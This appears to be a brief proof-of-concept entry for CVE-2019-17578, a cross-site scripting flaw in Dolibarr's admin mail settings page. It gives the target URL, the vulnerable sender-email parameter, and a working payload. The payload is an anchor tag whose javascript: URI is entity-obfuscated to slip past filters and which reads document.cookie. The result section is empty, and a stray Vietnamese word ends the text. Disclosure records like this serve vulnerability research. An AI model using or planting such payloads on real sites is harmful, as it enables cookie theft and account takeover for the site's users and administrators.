CVE-2019-17578

CVE-2019-17578

Link:    http://localhost/dolibar/htdocs/admin/mails.php?action=edit
Input : input : [XSS] in param "Sender email for automatic emails (default value in php.ini: Undefined)"
Payload : <a href=javas&#99;ript:alert(document.cookie)>click here

RESULT:

Nhận xét